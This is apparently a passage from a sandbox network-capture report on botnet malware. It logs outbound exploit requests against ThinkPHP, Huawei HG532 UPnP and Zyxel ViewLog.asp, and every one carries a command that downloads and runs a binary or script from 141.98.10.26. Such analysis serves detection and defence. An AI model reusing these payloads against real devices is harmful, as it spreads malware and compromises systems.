45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
458	192.168.2.23	55902	112.135.221.135	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:01.466941118 CET	8737	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:01.802283049 CET	8805	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:59 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
Nov 22, 2023 08:39:02.851897001 CET	8911	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:59 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
459	192.168.2.23	59800	112.196.31.73	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:01.480282068 CET	8738	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:01.836328983 CET	8806	IN	HTTP/1.0 400 Bad Request Server: CHD05_SDSL_SW2 Date: wed, 22 nov 2023 14:23:16 GMT Content-Length: 0 Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port
460	192.168.2.23	52430	112.185.179.122	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:01.734139919 CET	8802	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
461	192.168.2.23	41458	41.239.72.250	37215

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:02.196657896 CET	8819	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:39:04.217896938 CET	9061	IN	HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: text/xml; charset="utf-8" Server: Linux UPnP/1.0 Huawei-ATP-IGD Date: Sat, 01 Jan 2000 08:39:53 GMT EXT: Content-Length: 259

Session ID	Source IP	Source Port	Destination IP	Destination Port
462	192.168.2.23	52966	85.209.138.165	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:02.819631100 CET	8909	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.041645050 CET	8925	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Wed, 22 Nov 2023 07:15:16 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
463	192.168.2.23	58864	94.121.185.159	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:02.824253082 CET	8909	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
464	192.168.2.23	56336	95.214.179.244	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:02.894488096 CET	8912	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:04.457489967 CET	9156	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:06.281234026 CET	9300	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:10.088669062 CET	9767	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:17.511791945 CET	10645	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:32.101649046 CET	12402	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:02.817289114 CET	16124	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
465	192.168.2.23	49232	62.34.72.59	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:02.999188900 CET	8913	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.561642885 CET	9032	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:04.649447918 CET	9162	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
466	192.168.2.23	56150	31.136.207.15	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:03.004031897 CET	8914	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.561623096 CET	9031	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:04.681433916 CET	9163	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:07.017111063 CET	9408	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
